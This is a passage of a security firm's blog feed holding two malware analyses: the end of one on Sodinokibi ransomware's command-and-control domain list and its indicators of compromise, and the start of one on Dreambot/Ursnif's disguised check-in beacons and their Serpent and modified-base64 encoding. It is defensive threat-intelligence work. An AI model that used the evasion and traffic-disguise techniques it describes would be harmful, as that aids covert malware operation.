&lt;p&gt;Once the encryption is finished, Sodinokibi starts to iterate through a giant list of domains hardcoded in the configuration (about 1k). These domains are the same across the samples we analyzed but they are ordered differently in order to mislead the analysis.&lt;/p&gt;
&lt;p&gt;At a first glance, these domains seem legit and most of them are correctly registered.&lt;/p&gt;
&lt;p&gt;This is not a classic DGA but the result is almost the same because the purpose is to hide the real C&amp;#x26;C Server used by cyber criminals.&lt;/p&gt;
&lt;p&gt;For each domain listed, Sodinokibi generates a random URI. Then it uses the winhttp.dll library functions to perform HTTPS POST requests with the created URLs.&lt;/p&gt;
&lt;p&gt;The data sent with the POST request is an encrypted form of the JSON configuration saved on the “HKEY_LOCAL_MACHINE\SOFTWARE\recfg\stat” registry key and described on the “Machine information recovery” section. In this way, malicious actors can collect important information of the infected machine.&lt;/p&gt;
&lt;p&gt;The following are examples of some of these URLs:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1309px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ef536d514e29c0e9b1b164cbfb10aa16/7c5b4/MalwareTalesSo19.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.458333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAWUlEQVR42j2K3QqAIAyFfYG2CXblmC8WlDkvwnz/26ZRcPg4fw4xTx0/Cc+wFpGWUhO5jCEo0lzp+P7Z+80BVgAFMJZplKjGeDN3jn2Qu0UrF1AcKu+TaH8ADuoVibi7l8QAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo19&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ef536d514e29c0e9b1b164cbfb10aa16/7c5b4/MalwareTalesSo19.png&quot;
        srcset=&quot;/website/static/ef536d514e29c0e9b1b164cbfb10aa16/804b2/MalwareTalesSo19.png 384w,
/website/static/ef536d514e29c0e9b1b164cbfb10aa16/e5715/MalwareTalesSo19.png 768w,
/website/static/ef536d514e29c0e9b1b164cbfb10aa16/7c5b4/MalwareTalesSo19.png 1309w&quot;
        sizes=&quot;(max-width: 1309px) 100vw, 1309px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Looking at an analysis of this sample in a sandbox (&lt;a href=&quot;https://app.any.run/tasks/e2b0ee0f-ac20-497f-bc2d-c1293e155664/&quot;&gt;AnyRun&lt;/a&gt;), we noticed that HTTPS requests where not correctly listed. The malware can avoid traffic interception by proxies like Fiddler or Mitmproxy that are used for manual or automatic analysis.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1152px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/241df0697ebd3af603be39a51e1eb7f1/4ad3a/MalwareTalesSo20.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 36.97916666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAABYlAAAWJQFJUiTwAAABXElEQVR42h1Ou07DQBD0n1MjITqoaKigoeDRUCBCeCmCQCAktsP5nj7b97Bzse9sRzScM1qtZlc7Mxusq0oKqbUWhRiQF37MfZdSyYGI3aik2h1IYzZd1znn+r4PlJCM0izLCMaUUsYYIZQORfweQUQwUUobY+p6U9d10zReaa1t2y4o8gxj4jUIQkIwAAlGEMMkjiOYoDgCACCMcJqydoBr3Q7W+vzA2q3/XCvlPevBua5sa5reNlvnjHOVc2ufY53r+t61rSe+N9Z1XR9IbmaPo9e72984BMu5zulb+PT8cZ6ElwwdpeSAoWNOw+jnm4bzSnCji0pma5WZUgad0+jiDJ+elCwpQPy3KcbJz2T2oNE7hPuc7Ql6WPDoaTR6ex7Hi+/Vcg6ihScUgaBvSrL8ylaLkiOdwb+mTPlngq6rfKTEjdZXrbnflPxrOp1OXqaTVy9OMaBwpQX/Byj7dLB8hTpgAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesSo20&quot;
        title=&quot;&quot;
        src=&quot;/website/static/241df0697ebd3af603be39a51e1eb7f1/4ad3a/MalwareTalesSo20.png&quot;
        srcset=&quot;/website/static/241df0697ebd3af603be39a51e1eb7f1/804b2/MalwareTalesSo20.png 384w,
/website/static/241df0697ebd3af603be39a51e1eb7f1/e5715/MalwareTalesSo20.png 768w,
/website/static/241df0697ebd3af603be39a51e1eb7f1/4ad3a/MalwareTalesSo20.png 1152w&quot;
        sizes=&quot;(max-width: 1152px) 100vw, 1152px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;I suggest to read the following blog post where it’s further explained how these URLs are generated and why also this routine is inspired by GandCrab code: Tesorion analysis&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;8.Conclusion&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Sodinokibi&lt;/strong&gt;&lt;/em&gt; could be the &lt;em&gt;&lt;strong&gt;heir&lt;/strong&gt;&lt;/em&gt; of &lt;em&gt;&lt;strong&gt;GandCrab&lt;/strong&gt;&lt;/em&gt;. It’s still at version 1.01 so maybe it’s not mature yet but is actively developed and updated&lt;/p&gt;
&lt;p&gt;Malicious actors have started to use &lt;em&gt;&lt;strong&gt;Sodinokibi&lt;/strong&gt;&lt;/em&gt; to generate profit, even in Italy.&lt;/p&gt;
&lt;p&gt;It’s important to continuously &lt;em&gt;&lt;strong&gt;monitor&lt;/strong&gt;&lt;/em&gt; your own assets, both on a network and an endpoint level, to fight against these kind of threats.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Certego Threat Intelligence Team&lt;/strong&gt;&lt;/em&gt; has been studying upcoming cyber threats for years in order to provide the best protection to their customers.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;IOC&lt;/strong&gt;&lt;/h1&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;hkey_local_machine\software\recfg\stat&quot;&gt;&lt;pre class=&quot;language-hkey_local_machine\software\recfg\stat&quot;&gt;&lt;code class=&quot;language-hkey_local_machine\software\recfg\stat&quot;&gt;HKEY_LOCAL_MACHINE\SOFTWARE\recfg\pk_key
decryptor[.]top
aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1&gt;&lt;strong&gt;Author:&lt;/strong&gt;&lt;/h1&gt;
&lt;h3&gt;Matteo Lodi, Threat Intelligence Team Leader&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Malware Tales: Dreambot]]></title><description><![CDATA[Today we are going to talk about one of the biggest threats that is spreading in these days, in particular in Italy: Dreambot, the most recent version of a malware also known as Ursnif, or Gozi.]]></description><link>https://www.certego.net/blog/malware-tales-dreambot/</link><guid isPermaLink="false">malware-tales-dreambot</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Team Leader]]></dc:creator><pubDate>Mon, 15 Apr 2019 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Today we are going to talk about one of the biggest threats that is spreading in these days, in particular in Italy: Dreambot, the most recent version of a malware also known as Ursnif, or Gozi.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;The Threat&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;The Check-In phase&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Encryption routine&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Injected Internet Explorer? Or not?&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;&lt;strong&gt;1.The Threat&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Ursnif belongs to the category of Infostealers. It was already analyzed by a lot of skilled researchers. I list just some of the best analysis you could find:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html?q=gozi&quot;&gt;Vitaly Kremez&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/&quot;&gt;0verfl0w&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://reaqta.com/2018/11/ursnif-reloaded-tracing-latest-campaigns/&quot;&gt;ReaQta&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://benkow.cc/DreambotSAS19.pdf&quot;&gt;Benkow&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In this article, we&apos;ll focus on the initial communication with the Command &amp;#x26; Control infrastructure.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;2.The Check-In phase&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;At the time of the compilation of the malware, spreaders can choose a list of domains that will be hardcoded in the sample in an encrypted form.&lt;/p&gt;
&lt;p&gt;For example, the following image shows 3 different domains uploaded into the memory of one of the variant that we analyzed.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 627px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8a4742563d857ff4ea1c65d01495491c/e9c9b/MalwareTalesDreambot1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 17.708333333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA30lEQVR42hXI206DMACAYd7/cbzY4grbgIqBUsqhpY2cWgYzBmEgZpnBBDH5L/582n7/BIwdhKezBSxomLZ+NoF9OJpAt4+Gs7FpWEDXn3f26X/cFxt7ryF2t7Q2z2Z57VvZZdWk2lteD1U95e1X2fRc9lL2m4h6Lq5dWHVhOZbNch/X33ldZo0TnLkJjwMaIB4SGqHYd5mDmYc5xqqgRRkpRlXCLoJVQTRc1HIf1p9pfYxaSojwUxFQjmKOKPOj2AshQPCAfIgTFAcO4SSRSdqIt5pzxcXUv3/fPh7z5x+qs8hSqEpnuAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8a4742563d857ff4ea1c65d01495491c/e9c9b/MalwareTalesDreambot1.png&quot;
        srcset=&quot;/website/static/8a4742563d857ff4ea1c65d01495491c/804b2/MalwareTalesDreambot1.png 384w,
/website/static/8a4742563d857ff4ea1c65d01495491c/e9c9b/MalwareTalesDreambot1.png 627w&quot;
        sizes=&quot;(max-width: 627px) 100vw, 627px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The malicious agent tries to perform its initial communication with the first of the list, then, if it fails, it would try with the next and so on.&lt;/p&gt;
&lt;p&gt;We underline that this &quot;&lt;em&gt;&lt;strong&gt;beacon&lt;/strong&gt;&lt;/em&gt;&quot; is always performed via plain HTTP while the following steps of communication are done via SSL encryption and custom certificates.&lt;/p&gt;
&lt;p&gt;This is important because, with the right eye, even without SSL interception, we can pretty easily spot if something is going wrong.&lt;/p&gt;
&lt;p&gt;The following image shows 3 different attempts to communicate with the C2 server in a sandbox environment.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1078px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f47de88e438f836d2b61ce5d01ead6b0/97bfd/MalwareTalesDreambot2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 24.739583333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAoUlEQVR42lWO2w6EIAxE+f9/dCmQqFwsbrKCGh92WncfPMbplASPhpnHcRyG4aVYa5G/RVeyFGNMKSO0xFKKzJTMKrxzzimnUjJzbWCTR0LZ9/04jt47SlewXtdlmJfbTETOe0vkvXcO1RMyBB9QPTwLYAmYaxWHmGtdYS4KTlW3gc92p8z2oOM9z9Pg6hxn8Yg4kOL+oOJfpmnCR8uT1toXzc0T5OWb4o8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f47de88e438f836d2b61ce5d01ead6b0/97bfd/MalwareTalesDreambot2.png&quot;
        srcset=&quot;/website/static/f47de88e438f836d2b61ce5d01ead6b0/804b2/MalwareTalesDreambot2.png 384w,
/website/static/f47de88e438f836d2b61ce5d01ead6b0/e5715/MalwareTalesDreambot2.png 768w,
/website/static/f47de88e438f836d2b61ce5d01ead6b0/97bfd/MalwareTalesDreambot2.png 1078w&quot;
        sizes=&quot;(max-width: 1078px) 100vw, 1078px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;If the pattern is not known, an untrained analyst could be misleaded by this behaviour while performing threat hunting on network logs or artifacts.&lt;/p&gt;
&lt;p&gt;The file extension &quot;.avi&quot; refers to video files. Also, the path &quot;/images/&quot; is deceptive. In addition, it&apos;s performed as a &quot;GET&quot; request. All of this evidence could be seen as a normal download of a video file from a site hosting media.
In fact it&apos;s the check-in of the malware that is sending basic information about the compromised machine, hiding them in plain sight in the URI path.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e74bc5c13e689f254728081c850bc4cd/7131f/MalwareTalesDreambot3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.229166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAkklEQVR42l1Oyw7DIAzr///geCSIjpBAu2o7ltuM1knTrAhsxyQsvbXeN5FqZr33fdtVDbJWbTZJztmsqSocFDLoWWsisjCz9yGEiDPG6Jxn4kgEAtd7724uBEKLOcHHrBgppeScm4+J+NomE2teSylQ94mCdJWKzfB03kgKvonA8jiO5+t1/mCMcY6LfPGR5x/ef6PYg8J2wnIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e74bc5c13e689f254728081c850bc4cd/7131f/MalwareTalesDreambot3.png&quot;
        srcset=&quot;/website/static/e74bc5c13e689f254728081c850bc4cd/804b2/MalwareTalesDreambot3.png 384w,
/website/static/e74bc5c13e689f254728081c850bc4cd/7131f/MalwareTalesDreambot3.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Decoded data:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/966c528d3d18a73611088327393969e1/7131f/MalwareTalesDreambot4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.458333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVElEQVR42k2MSQ7AMAgD8/9XBnBoUg5ZlAfU3DryAY9kSkSIqLtLogwAM7TEvbU+hjcHWB4qVaOHYc5Z3ohapffOzo1qPjLlCcpNztk/1kq11773fqiqbMlnn6osAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/966c528d3d18a73611088327393969e1/7131f/MalwareTalesDreambot4.png&quot;
        srcset=&quot;/website/static/966c528d3d18a73611088327393969e1/804b2/MalwareTalesDreambot4.png 384w,
/website/static/966c528d3d18a73611088327393969e1/7131f/MalwareTalesDreambot4.png 710w&quot;
        sizes=&quot;(max-width: 710px) 100vw, 710px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;fjidtflrb -&gt; junk param, always present at the start of the URI to generate randomness (and always different)&lt;/li&gt;
&lt;li&gt;soft -&gt; major version&lt;/li&gt;
&lt;li&gt;version -&gt; minor version&lt;/li&gt;
&lt;li&gt;user -&gt; unique user id&lt;/li&gt;
&lt;li&gt;server -&gt; unique c2 server id&lt;/li&gt;
&lt;li&gt;id -&gt; bot group id&lt;/li&gt;
&lt;li&gt;crc -&gt; payload to retrieve (1-DLL 32bit, 2-DLL64 bit, 3-ps1)&lt;/li&gt;
&lt;li&gt;uptime -&gt; time elapsed from initial infection (seconds)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The following image represents the phase when the malware creates the first parameter:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1079px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/99473a3db0e16be1b7863698147999be/cf4cc/MalwareTalesDreambot5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 30.989583333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHklEQVR42k2PW0vDQBSE8/9f/CeCD4JUEBTsg5WKRZO2ubTZpNnN3s+6STaXGmNbQZiHw8eZYcYbW+grke82Au/zyO+BalXO19eKL4bG9DUfnT4JWnVoaDxYOt1n6I2t7izHKFI0K5OwUyUAmftXDM8qa+taTunTz9iaVqIGB73KL3EteE5rK8Tq7TVYLVHg42S7T8OH5V26/sh2zxmaGV4YURiJOfLL7YtAgcI7YNkEve9GO8OyZM0OCY63DgiX5DG4YWQxGO50OlTiWMtJTmYV3nRAjo0+E28q4AwtUAgUQY46oJXm75+3HC8A+FctTgvV72aZOxb3+q/2aTNYWaAokCRlcWhZWmq4Xz0JNJOcGFv+MyNHo1agsbmYfwC2hkpw4EH7SwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/99473a3db0e16be1b7863698147999be/cf4cc/MalwareTalesDreambot5.png&quot;
        srcset=&quot;/website/static/99473a3db0e16be1b7863698147999be/804b2/MalwareTalesDreambot5.png 384w,
/website/static/99473a3db0e16be1b7863698147999be/e5715/MalwareTalesDreambot5.png 768w,
/website/static/99473a3db0e16be1b7863698147999be/cf4cc/MalwareTalesDreambot5.png 1079w&quot;
        sizes=&quot;(max-width: 1079px) 100vw, 1079px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;After having seen a lot of this kind of patterns on Ursnif samples in last years, I decided to create a simple and raw tool that is able to &lt;em&gt;&lt;strong&gt;decrypt&lt;/strong&gt;&lt;/em&gt; the URL created by the malware on the fly.&lt;/p&gt;
&lt;p&gt;In this way it&apos;s possible to spy the configuration sent to the Command &amp;#x26; Control server and, at the same time, to check if the URL is related to this threat.&lt;/p&gt;
&lt;p&gt;All of this without any need of manual reverse engineering.&lt;/p&gt;
&lt;p&gt;You can check the simple tool that I created on the following link on: &lt;a href=&quot;https://github.com/mlodic/ursnif_beacon_decryptor/tree/master&quot;&gt;GitHub&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This is an example of how to run the script:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 708px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d68c07fc7e277a4cfa6acaf36d7a0b0a/3cb0f/MalwareTalesDreambot6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.229166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAApElEQVR42iVP7Q7DIAjs+79g0YK2S1YFPzq3pb93ZhclJwd4LCnl1loptZSSUjKznLOpttbHeBezOpWazqSqBlYbys7nicaFyJHzcWJnZsS4HyIySYhBArhz3uH6jVm898jzxutKy4pADgNEAsQYgMgiOESEamQgHccDg1CJZpoNDn8s8JKzwg7Mm8JkgzMAz957naZrv67v5zNeA+v8F1Sz+75/g6DVaGfWORkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d68c07fc7e277a4cfa6acaf36d7a0b0a/3cb0f/MalwareTalesDreambot6.png&quot;
        srcset=&quot;/website/static/d68c07fc7e277a4cfa6acaf36d7a0b0a/804b2/MalwareTalesDreambot6.png 384w,
/website/static/d68c07fc7e277a4cfa6acaf36d7a0b0a/3cb0f/MalwareTalesDreambot6.png 708w&quot;
        sizes=&quot;(max-width: 708px) 100vw, 708px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;and the related output:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2b931d582c4b1c739174a69c68be762a/4d08a/MalwareTalesDreambot7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 31.770833333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA40lEQVR42l2Q646EIAyFff/3G5FrEQqI0RVX1997dLPJZE5iW7A9/UJXayXyidNcK3NaliXGmHIuOSPPdWaOIYSUcmSuU22t7Y/O8+xKKRhm/Ly7uZQpjMF7j4EYonUOXiiNMWjzRMZYT8jjuq4dZqRU1lqJJNWr79EnhHDWWWOVUkbjAgenlFZSam0sLB0BucM3joGZ4QJ48GIn4ra170f73rZtO44DEcyIX49wc29+9cI5wBD8MElE+ta9cBgGUGilHRHIyBEYgSDEUOvc7a1NZZpKwdvA7Odf13V9FH/1u34BOD1DDmNzthUAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;MalwareTalesDreambot7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2b931d582c4b1c739174a69c68be762a/4d08a/MalwareTalesDreambot7.png&quot;
        srcset=&quot;/website/static/2b931d582c4b1c739174a69c68be762a/804b2/MalwareTalesDreambot7.png 384w,
/website/static/2b931d582c4b1c739174a69c68be762a/4d08a/MalwareTalesDreambot7.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3.Encryption routine&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;The custom algorithm starts with a symmetric encryption that leverages the &lt;em&gt;&lt;strong&gt;Serpent&lt;/strong&gt;&lt;/em&gt; cipher in CBC mode and a null IV (initialization vector).&lt;/p&gt;
&lt;p&gt;Afterwards the result is encoded with a classic base64. Considering that base64 encoding is pretty easy to spot, malware authors decided to change things a little more. They removed padding characters(&quot;=&quot;) and substituted the other special characters (&quot;+&quot;, &quot;/&quot;) with the relative ASCII code, after having prepended them by an underscore (&quot;_2f&quot;, &quot;_2b&quot;). The last tweak is to add slashes at specified offsets to let the URI to appear like a real one.&lt;/p&gt;
&lt;p&gt;Obviously, the Serpent encryption needs a key. We can find it hardcoded on the malware sample. Some code level analysis could be required to get that info.&lt;/p&gt;
&lt;p&gt;However, observations led to the fact that the key is usually shared among a lot of samples and rarely changed.&lt;/p&gt;
&lt;p&gt;If you don&apos;t have one, just run the script: it would try a predefined list of known keys for you.&lt;/p&gt;
